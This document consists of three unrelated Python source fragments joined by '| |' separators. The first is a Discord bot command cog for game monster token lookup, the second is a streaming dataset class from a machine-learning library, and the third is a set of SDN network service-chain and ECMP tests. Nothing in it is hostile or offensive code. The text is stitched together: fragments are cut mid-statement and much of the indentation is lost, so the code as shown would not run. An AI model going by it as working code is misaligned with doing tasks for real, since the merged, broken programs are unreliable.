atable = [(awakenings[k.value].name_en, ", ".join(map(inline, v))) for k, v in maps.AWOKEN_SKILL_MAP.items()]
ret += "\n\n### Awakenings\n\n" + tabulate(atable, headers=["Meaning", "Tokens"], tablefmt="github")
stable = [(series[k].name_en, ", ".join(map(inline, v)))
for k, v in DGCOG.indexes[server].series_id_to_pantheon_nickname.items()]
ret += "\n\n### Series\n\n" + tabulate(stable, headers=["Meaning", "Tokens"], tablefmt="github")
ctable = [(k.name.replace("Nil", "None"), ", ".join(map(inline, v))) for k, v in maps.COLOR_MAP.items()]
ctable += [("Sub " + k.name.replace("Nil", "None"), ", ".join(map(inline, v))) for k, v in
maps.SUB_COLOR_MAP.items()]
for k, v in maps.DUAL_COLOR_MAP.items():
k0name = k[0].name.replace("Nil", "None")
k1name = k[1].name.replace("Nil", "None")
ctable.append((k0name + "/" + k1name, ", ".join(map(inline, v))))
ret += "### Attributes\n\n" + tabulate(ctable, headers=["Meaning", "Tokens"], tablefmt="github")
await ctx.send(file=text_to_file(ret, filename="table.md"))
@commands.command(aliases=["idcheckmod", "lookupmod", "idlookupmod", "luid", "idlu"])
async def idmeaning(self, ctx, token, server: Optional[Server] = Server.COMBINED):
"""Get all the meanings of a token (bold signifies base of a tree)"""
token = token.replace(" ", "")
DGCOG = await self.get_dgcog()
tms = DGCOG.token_maps
awokengroup = "(" + "|".join(re.escape(aw) for aws in tms.AWOKEN_SKILL_MAP.values() for aw in aws) + ")"
awakenings = {a.awoken_skill_id: a for a in DGCOG.database.get_all_awoken_skills()}
series = {s.series_id: s for s in DGCOG.database.get_all_series()}
ret = ""
def write_name_token(token_dict, token_type, is_multiword=False):
def f(m, s):
return bold(s) if DGCOG.database.graph.monster_is_base(m) else s
token_ret = ""
so = []
for mon in sorted(token_dict[token], key=lambda m: m.monster_id):
if (mon in DGCOG.indexes[server].mwtoken_creators[token]) == is_multiword:
so.append(mon)
if len(so) > 5:
token_ret += f"\n\n{token_type}\n" + ", ".join(f(m, str(m.monster_id)) for m in so[:10])
token_ret += f"... ({len(so)} total)" if len(so) > 10 else ""
elif so:
token_ret += f"\n\n{token_type}\n" + "\n".join(
f(m, f"{str(m.monster_id).rjust(4)}. {m.name_en}") for m in so)
return token_ret
ret += write_name_token(DGCOG.indexes[server].manual, "\N{LARGE PURPLE CIRCLE} [Multi-Word Tokens]", True)
ret += write_name_token(DGCOG.indexes[server].manual, "[Manual Tokens]")
ret += write_name_token(DGCOG.indexes[server].name_tokens, "[Name Tokens]")
ret += write_name_token(DGCOG.indexes[server].fluff_tokens, "[Fluff Tokens]")
submwtokens = [t for t in DGCOG.indexes[server].multi_word_tokens if token in t]
if submwtokens:
ret += "\n\n[Multi-word Super-tokens]\n"
for t in submwtokens:
if not DGCOG.indexes[server].all_name_tokens[''.join(t)]:
continue
creators = sorted(DGCOG.indexes[server].mwtoken_creators["".join(t)], key=lambda m: m.monster_id)
ret += f"{' '.join(t).title()}"
ret += f" ({', '.join(f'{m.monster_id}' for m in creators)})" if creators else ''
ret += (" ( \u2014> " +
str(DGCOG.mon_finder.get_most_eligable_monster(
DGCOG.indexes[server].all_name_tokens[''.join(t)]).monster_id)
+ ")\n")
def additmods(ms, om):
if len(ms) == 1:
return ""
return "\n\tAlternate names: " + ', '.join(inline(m) for m in ms if m != om)
meanings = '\n'.join([
*["Evo: " + k.value + additmods(v, token)
for k, v in tms.EVO_MAP.items() if token in v],
*["Type: " + get_type_emoji(k) + ' ' + k.name + additmods(v, token)
for k, v in tms.TYPE_MAP.items() if token in v],
*["Misc: " + k.value + additmods(v, token)
for k, v in tms.MISC_MAP.items() if token in v],
*["Awakening: " + get_awakening_emoji(k) + ' ' + awakenings[k.value].name_en + additmods(v, token)
for k, v in tms.AWOKEN_SKILL_MAP.items() if token in v],
*["Main attr: " + get_attribute_emoji_by_enum(k, None) + ' ' + k.name.replace("Nil", "None") +
additmods(v, token)
for k, v in tms.COLOR_MAP.items() if token in v],
*["Sub attr: " + get_attribute_emoji_by_enum(False, k) + ' ' + k.name.replace("Nil", "None") +
additmods(v, token)
for k, v in tms.SUB_COLOR_MAP.items() if token in v],
*["Dual attr: " + get_attribute_emoji_by_enum(k[0], k[1]) + ' ' + k[0].name.replace("Nil", "None") +
'/' + k[1].name.replace("Nil", "None") + additmods(v, token)
for k, v in tms.DUAL_COLOR_MAP.items() if token in v],
*["Series: " + series[k].name_en + additmods(v, token)
for k, v in DGCOG.indexes[server].series_id_to_pantheon_nickname.items() if token in v],
*["Rarity: " + m for m in re.findall(r"^(\d+)\*$", token)],
*["Base rarity: " + m for m in re.findall(r"^(\d+)\*b$", token)],
*[f"[UNSUPPORTED] Multiple awakenings: {m}x {awakenings[a.value].name_en}"
f"{additmods([f'{m}*{d}' for d in v], token)}"
for m, ag in re.findall(r"^(\d+)\*{}$".format(awokengroup), token)
for a, v in tms.AWOKEN_SKILL_MAP.items() if ag in v]
])
if meanings or ret:
for page in pagify(meanings + "\n\n" + ret.strip()):
await ctx.send(page)
else:
await ctx.send(f"There are no modifiers that match `{token}`.")
@commands.command(aliases=["tracebackid", "tbid", "idtb"])
async def idtraceback(self, ctx, *, query):
"""Get the traceback of an id query"""
selected_monster_id = None
if "/" in query:
query, selected_monster_id = query.split("/", 1)
if not selected_monster_id.strip().isdigit():
await ctx.send("Monster id must be an int.")
return
selected_monster_id = int(selected_monster_id.strip())
dgcog = await self.get_dgcog()
bestmatch, matches, _, _ = await dgcog.mon_finder.find_monster_debug(query)
if bestmatch is None:
await ctx.send("No monster matched.")
return
if selected_monster_id is not None:
selected = {m for m in matches if m.monster_id == selected_monster_id}
if not selected:
await ctx.send("The requested monster was not found as a result of the query.")
return
monster = selected.pop()
else:
monster = bestmatch
score = matches[monster].score
ntokens = matches[monster].name
mtokens = matches[monster].mod
lower_prio = {m for m in matches if matches[m].score == matches[monster].score}.difference({monster})
if len(lower_prio) > 20:
lpstr = f"{len(lower_prio)} other monsters."
else:
lpstr = "\n".join(f"{get_attribute_emoji_by_monster(m)} {m.name_en} ({m.monster_id})" for m in lower_prio)
mtokenstr = '\n'.join(f"{inline(t[0])}{(': ' + t[1]) if t[0] != t[1] else ''}"
f" ({round(dgcog.mon_finder.calc_ratio_modifier(t[0], t[1]), 2) if | |
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""The :class:`StreamingDataset` class, used for building streaming iterable datasets.
"""
import math
import os
from threading import Lock, Thread
from time import sleep
from typing import Any, Callable, Dict, Iterator, Optional
import numpy as np
from torch.utils.data import IterableDataset
from composer.datasets.streaming.download import download_or_wait
from composer.datasets.streaming.format import (StreamingDatasetIndex, bytes_to_sample_dict, get_index_basename,
get_shard_basename)
from composer.datasets.streaming.world import get_world
from composer.utils import dist
__all__ = ['StreamingDataset']
class StreamingDataset(IterableDataset):
"""A sharded, streaming, iterable dataset.
:class:`StreamingDataset` reads samples from binary `.mds` files that were written out by :class:`StreamingDatasetWriter`.
It currently supports downloading data from either S3 paths or local filepaths.
It supports multi-gpu + multi-node training, and has smart local caching to minimize network bandwidth.
It also provides best-effort shuffling to preserve randomness when ``shuffle=True``.
Args:
remote (str): Download shards from this remote S3 path or directory.
local (str): Download shards to this local directory for caching.
shuffle (bool): Whether to shuffle the samples. Note that if `shuffle=False`, the sample order is deterministic but dependent on the DataLoader's `num_workers`.
decoders (Dict[str, Callable[[bytes], Any]]): For each sample field you wish to read, you must provide a decoder to convert the raw bytes to an object.
max_retries (int): Number of download re-attempts before giving up. Default: 2.
timeout (float): How long to wait for shard to download before raising an exception. Default: 60 sec.
batch_size (Optional[int]): Hint the batch_size that will be used on each device's DataLoader. Default: ``None``.
Worker indices will be constructed so that there is at most 1 incomplete batch at the end of each epoch.
E.g. if the DataLoader is reading over (samples=[0, 1, 2, 3, 4, 5, 6, 7], num_workers=3, batch_size=2, drop_last=True)
but `batch_size` is not hinted to the StreamingDataset ahead of time
then the samples will by default be assigned like: w0: [0, 1, 2], w1: [3, 4, 5], w2: [6, 7]
and will be read as batches: [0, 1], [3, 4], [6, 7] (with batches [2] and [5] dropped as incomplete)
but this is suboptimal because we could have dropped no samples.
So when `batch_size` is provided as a hint, we assign samples like this: w0: [0, 1, 2, 3], w1: [4, 5], w2: [6, 7]
which will be read as batches: [0, 1], [4, 5], [6, 7], [2, 3]
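One way to picture that batch-aligned assignment (an illustrative sketch only;
the actual partitioning is performed by the index's ``get_partition``, and
``assign_samples`` below is a hypothetical helper)::

    def assign_samples(num_samples, num_workers, batch_size):
        # Deal out whole batches, keeping each worker's share contiguous.
        ids = list(range(num_samples))
        batches = [ids[i:i + batch_size] for i in range(0, len(ids), batch_size)]
        base, extra = divmod(len(batches), num_workers)
        shares, start = [], 0
        for w in range(num_workers):
            n = base + (1 if w < extra else 0)
            shares.append([s for b in batches[start:start + n] for s in b])
            start += n
        return shares

    assign_samples(8, 3, 2)  # -> [[0, 1, 2, 3], [4, 5], [6, 7]]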
.. doctest::
To write the dataset:
>>> from composer.datasets.streaming import StreamingDatasetWriter
>>> samples = [
... {
... "uid": f"{ix:06}".encode("utf-8"),
... "data": (3 * ix).to_bytes(4, "big"),
... "unused": "blah".encode("utf-8"),
... }
... for ix in range(100)
... ]
>>> dirname = "remote"
>>> fields = ["uid", "data"]
>>> with StreamingDatasetWriter(dirname=dirname, fields=fields) as writer:
... writer.write_samples(samples=samples)
To read the dataset:
>>> from composer.datasets.streaming import StreamingDataset
>>> remote = "remote"
>>> local = "local"
>>> decoders = {
... "uid": lambda uid_bytes: uid_bytes.decode("utf-8"),
... "data": lambda data_bytes: int.from_bytes(data_bytes, "big"),
... }
>>> dataset = StreamingDataset(remote=remote, local=local, shuffle=False, decoders=decoders)
"""
def __init__(self,
remote: str,
local: str,
shuffle: bool,
decoders: Dict[str, Callable[[bytes], Any]],
max_retries: int = 2,
timeout: float = 60,
batch_size: Optional[int] = None) -> None:
self.remote = remote
self.local = local
self.shuffle = shuffle
self.decoders = decoders
self.max_retries = max_retries
self.timeout = timeout
self.batch_size = batch_size
# Load the index file containing the shard metadata
# This file contains the shard and offset in bytes of each sample (for direct access).
# Only local device 0 on each node downloads the index. All other devices wait.
index_basename = get_index_basename()
index_local = self._download_file(index_basename, wait=(dist.get_local_rank() != 0))
with open(index_local, 'rb') as fp:
self.index = StreamingDatasetIndex.load(fp)
# Fields, protected by the lock, relating to loading shards in the background.
self._lock: Lock
self._next_epoch = 0
self._epoch_to_todo_ids = {}
self._downloaded_ids = []
self._is_downloaded = False
def _download_file(self, basename: str, wait=False) -> str:
"""Safely download a file from remote to local cache.
Args:
basename (str): Basename of file to download.
wait (bool): Whether to wait for another worker to download the file.
Returns:
str: Local cache filename.
"""
remote = os.path.join(self.remote, basename)
local = os.path.join(self.local, basename)
download_or_wait(remote=remote, local=local, wait=wait, max_retries=self.max_retries, timeout=self.timeout)
return local
def _insert_shard_samples(self, shard: int, part_min_id: int, part_max_id: int) -> None:
"""Load the given locally cached shard into the dataset.
Every time you call __iter__ on this dataset, it registers the list of
samples you have left, which will not be the full epoch if the dataset
hasn't finished downloading when you start training.
Calls to _insert_shard_samples during training modify the samples remaining in
those in-progress iterations on the fly, inserting the new samples and then
re-shuffling, keeping the shuffle as close to perfect as possible.
This operation takes the lock, so batch your _insert_shard_samples calls where
possible.
Args:
shard (int): Shard to load.
part_min_id (int): Minimum sample ID of this partition.
part_max_id (int): Maximum sample ID of this partition.
"""
# Get all samples from the given shards that fall within our partition.
shard_min_id = self.index.shard_begins[shard]
shard_max_id = self.index.shard_ends[shard] - 1
min_id = max(part_min_id, shard_min_id)
max_id = min(part_max_id, shard_max_id)
new_ids = list(range(min_id, max_id + 1))
with self._lock:
# Extend and optionally reshuffle the remaining samples of any
# epochs we have in progress.
if self.shuffle:
if not self._is_downloaded:
self._downloaded_ids.extend(new_ids)
np.random.shuffle(self._downloaded_ids)
for todo_ids in self._epoch_to_todo_ids.values():
todo_ids.extend(new_ids)
np.random.shuffle(todo_ids)
else:
if not self._is_downloaded:
self._downloaded_ids.extend(new_ids)
for todo_ids in self._epoch_to_todo_ids.values():
todo_ids.extend(new_ids)
def download(self) -> None:
"""Download and assimilate missing shards."""
if not hasattr(self, '_lock'):
self._lock = Lock()
with self._lock:
if self._is_downloaded:
return
# We find out num workers, and therefore num partitions, when __iter__ is called.
# From the partition, derive our shard overlap range and exact sample range.
world = get_world()
part_shards, part_shards_to_download, part_min_id, part_max_id = self.index.get_partition(
world, self.batch_size)
if self.shuffle:
# Always process first shard first because other workers may be waiting on it
part_shards = np.array(part_shards)
np.random.shuffle(part_shards[1:])
for shard in part_shards:
# If this worker is in charge of downloading the shard, download it.
# Otherwise, wait until shard gets downloaded by another worker on this node
# This produces deterministic sample order.
basename = get_shard_basename(shard)
self._download_file(basename, wait=(shard not in part_shards_to_download))
self._insert_shard_samples(shard, part_min_id, part_max_id)
with self._lock:
self._is_downloaded = True
def __len__(self) -> int:
"""Get the length of the dataset.
Returns:
int: Dataset length.
"""
return math.ceil(self.index.total_samples / dist.get_world_size())
def _unpack_sample(self, data: bytes) -> Dict[str, Any]:
"""Unpack a sample dict from raw bytes.
First unpacks the str to raw bytes dict, then unpacks each field's raw bytes.
Args:
data (bytes): The packed bytes of the sample.
Returns:
Dict[str, Any]: The sample dict.
"""
key_to_raw = bytes_to_sample_dict(data, self.index.fields)
obj = {}
for key, decode in self.decoders.items():
raw_value = key_to_raw[key]
decoded_value = decode(raw_value)
obj[key] = decoded_value
return obj
def __getitem__(self, idx: int) -> Any:
"""Get the sample at the index, assuming its shard is loaded.
Do not call this directly unless the shard containing this idx has been loaded.
Will crash otherwise.
Args:
idx (int): Sample ID.
Returns:
Any: The sample.
"""
shard = self.index.sample_shards[idx]
offset = self.index.sample_shard_offsets[idx]
size = self.index.bytes_per_sample[idx]
basename = get_shard_basename(shard)
shard_filename = os.path.join(self.local, basename)
with open(shard_filename, 'rb', 0) as fp:
fp.seek(offset)
data = fp.read(size)
return self._unpack_sample(data)
def _make_new_growing_epoch(self) -> int:
"""Start a new growing epoch, in which we own the sample sequence because it grows.
Returns:
int: The epoch ID, an identifier which is given back to the caller.
"""
with self._lock:
epoch = self._next_epoch
self._next_epoch += 1
self._epoch_to_todo_ids[epoch] = list(self._downloaded_ids)
return epoch
def _next_id(self, epoch: int) -> Optional[int]:
"""Get next sample of the growing epoch given by epoch, or None if done.
If we are currently out of samples but not finished downloading the
shards, blocks until it has new samples.
Args:
epoch (int): The epoch, an identifier for this sequence of samples.
Returns:
int: ID of next sample.
"""
while True:
with self._lock:
todo_ids = self._epoch_to_todo_ids[epoch]
if todo_ids:
# Higher perf to pop last, but shuffle=False wants in-order traversal
if self.shuffle:
return todo_ids.pop(-1)
else:
return todo_ids.pop(0)
elif self._is_downloaded:
del self._epoch_to_todo_ids[epoch]
return None
else:
pass
sleep(0.25)
def _iter_ids(self) -> Iterator[int]:
"""Get an iterator over | |
: 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 }]
self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
# end test_three_stage_SC_with_ECMP
@preposttest_wrapper
def test_multi_inline_SVC_VN_with_external_RT(self):
"""
Description: Validate multi-Inline SVC with ECMP.
Bug: 1436642
The Right VN and the left VN have external RTs configured.
The traffic between left and right VMs should go through the Service Chain.
Test steps:
1.Creating vm's - vm1 and vm2 in networks vn1 and vn2. Configure RT on the 2 VNs.
2.Creating a multi-stage service chain with in-network SIs, between the VNs.
3.There should be no traffic loss.
Pass criteria: Ping between the VMs should be successful and TCP traffic should reach vm2
from vm1 and vice-versa.
Maintainer : <EMAIL>
"""
si_list = [{'service_mode': 'in-network', 'max_inst': 1},
{'service_mode': 'in-network', 'max_inst': 1}]
ret_dict = self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
si_fixtures = ret_dict['si_fixtures']
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
left_vn_fq_name = left_vn_fixture.vn_fq_name
right_vn_fq_name = right_vn_fixture.vn_fq_name
self.logger.info('Adding User-defined RT to the end VNs')
right_vn_fixture.add_route_target(router_asn=random.randint(
1000, 2000), route_target_number=random.randint(9000000, 9500000))
left_vn_fixture.add_route_target(router_asn=random.randint(
2000, 3000), route_target_number=random.randint(8500000, 9000000))
result, msg = self.validate_svc_action(
left_vn_fq_name, si_fixtures[0], right_vm_fixture, src='left')
result, msg = self.validate_svc_action(
right_vn_fq_name, si_fixtures[-1], left_vm_fixture, src='right')
assert left_vm_fixture.ping_with_certainty(right_vm_fixture.vm_ip)
assert right_vm_fixture.ping_with_certainty(left_vm_fixture.vm_ip)
# end test_multi_inline_SVC_VN_with_external_RT
@preposttest_wrapper
def test_three_stage_SC_with_traffic(self):
"""
Description: Validate multi-Inline SVC with traffic.
Test steps:
1.Creating vm's - vm1 and vm2 in networks vn1 and vn2.
2.Creating 3 service instances.
3.Creating a service chain by applying the 3 service instances in a policy between t
he VNs.
4.There should be no traffic loss.
Pass criteria: Ping between the VMs should be successful and TCP traffic should reach vm2
from vm1 and vice-versa.
Maintainer : <EMAIL>
"""
si_list = [ { 'service_mode' : 'transparent', 'max_inst' : 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 },
{ 'service_mode' : 'in-network-nat', 'max_inst' : 2 } ]
if self.inputs.get_af() == 'v6':
si_list = [ { 'service_mode' : 'transparent', 'max_inst' : 2 },
{ 'service_mode' : 'in-network', 'max_inst' : 2 }]
ret_dict = self.verify_multi_inline_svc(si_list=si_list, create_svms=True,
**self.common_args)
last_si_fixture = ret_dict['si_fixtures'][-1]
svm_ids = last_si_fixture.svm_ids
dst_vm_list = [self.right_vm_fixture]
self.verify_traffic_flow(
self.left_vm_fixture, dst_vm_list, last_si_fixture,
self.left_vn_fixture)
# end test_three_stage_SC_with_traffic
class TestECMPSanityIPv6(TestECMPSanity):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPSanityIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_svc_v2_transparent_with_3_instance(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_v2_transparent_with_3_instance()
@test.attr(type=['cb_sanity', 'sanity'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_3_instance(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_in_network_with_3_instance()
@preposttest_wrapper
def test_ecmp_svc_in_network_with_static_route_no_policy(self):
super(TestECMPSanityIPv6,self).test_ecmp_svc_in_network_with_static_route_no_policy()
class TestECMPIPv6Fragments(BaseNeutronTest, TestECMPSanity, VerifyIntfMirror):
@classmethod
def setUpClass(cls):
#cls.set_af('v6')
cls.image_name='ubuntu-traffic'
super(TestECMPIPv6Fragments, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_fragments_packet_mode(self):
self.verify_svc_chain_with_fragments(max_inst=2,
service_mode='in-network',
create_svms=True,
packet_mode=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_fragments(self):
self.verify_svc_chain_with_fragments(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_packet_mode(self):
self.verify_svc_chain_with_mirror(max_inst=2,
service_mode='in-network',
create_svms=True,
packet_mode=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror(self):
self.verify_svc_chain_with_mirror(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_aap_packet_mode(self):
self.verify_svc_chain_with_mirror_aap(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_mirror_aap(self):
self.verify_svc_chain_with_mirror_aap(max_inst=2,
service_mode='in-network',
create_svms=True,
**self.common_args)
class TestECMPVro(TestECMPSanity):
@classmethod
def setUpClass(cls):
cls.vro_based = True
super(TestECMPVro, cls).setUpClass()
def is_test_applicable(self):
if self.inputs.orchestrator == 'vcenter' and not self.inputs.vro_based:
return(False, 'Skipping Test Vro server not present on vcenter setup')
return (True, None)
@test.attr(type=['vcenter','vro'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_svc_in_network_with_3_instance(self):
super(TestECMPVro,self).test_ecmp_svc_in_network_with_3_instance()
class TestECMPFeatureIPv6(TestECMPFeature):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPFeatureIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_svc_v2_in_network_nat_with_3_instance(self):
super(TestECMPFeatureIPv6,self).test_ecmp_svc_v2_in_network_nat_with_3_instance()
class TestECMPwithSVMChangeIPv6(TestECMPwithSVMChange):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestECMPwithSVMChangeIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@preposttest_wrapper
def test_ecmp_with_svm_deletion(self):
super(TestECMPwithSVMChangeIPv6,self).test_ecmp_with_svm_deletion()
class TestMultiInlineSVCIPv6(TestMultiInlineSVC):
@classmethod
def setUpClass(cls):
cls.set_af('v6')
super(TestMultiInlineSVCIPv6, cls).setUpClass()
def is_test_applicable(self):
if not self.connections.orch.is_feature_supported('ipv6'):
return(False, 'IPv6 tests not supported in this environment ')
return (True, None)
@test.attr(type=['sanity'])
@preposttest_wrapper
def test_svc_fate_sharing_basic(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic()
@preposttest_wrapper
def test_svc_fate_sharing_basic_with_transparent(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_transparent()
@preposttest_wrapper
def test_svc_fate_sharing_basic_with_transparent_in_net_nat(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_transparent_in_net_nat()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_in_net_in_net(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_in_net_in_net()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_basic_with_multiple_svm_instances(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_multiple_svm_instances()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_basic_with_3_svm_instances(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_basic_with_3_svm_instances()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_in_net_nat(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_in_net_nat()
@preposttest_wrapper
@skip_because(min_nodes=2)
def test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_transparent(self):
super(TestMultiInlineSVCIPv6,self).test_svc_fate_sharing_in_2_multi_inline_svc_chains_transparent_in_net_transparent()
@preposttest_wrapper
def test_three_stage_v2_SC(self):
super(TestMultiInlineSVCIPv6,self).test_three_stage_v2_SC()
class TestECMPConfigHashFeature(ECMPTestBase, VerifySvcFirewall, ECMPSolnSetup, ECMPTraffic, ECMPVerify):
@classmethod
def setUpClass(cls):
super(TestECMPConfigHashFeature, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestECMPConfigHashFeature, cls).tearDownClass()
# end tearDownClass
@test.attr(type=['sanity','vcenter'])
@preposttest_wrapper
@skip_because(min_nodes=3)
def test_ecmp_hash_src_ip(self):
"""
Validates ecmp hash when only source ip is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "source_ip"
ecmp_hash = {"source_ip": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_src_ip
@preposttest_wrapper
def test_ecmp_hash_dest_ip(self):
"""
Validates ecmp hash when only destination ip is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "destination_ip"
ecmp_hash = {"destination_ip": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_dest_ip
@preposttest_wrapper
def test_ecmp_hash_src_port(self):
"""
Validates ecmp hash when only source port is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
# Distribute End VMs and service VMs across compute nodes
vm_launch_mode = "distribute"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "source_port"
ecmp_hash = {"source_port": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
dst_vm_list = [right_vm_fixture]
si_fixture = ret_dict['si_fixture']
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_src_port
@preposttest_wrapper
def test_ecmp_hash_dest_port(self):
"""
Validates ecmp hash when only destination port is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "destionation_port"
ecmp_hash = {"destination_port": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
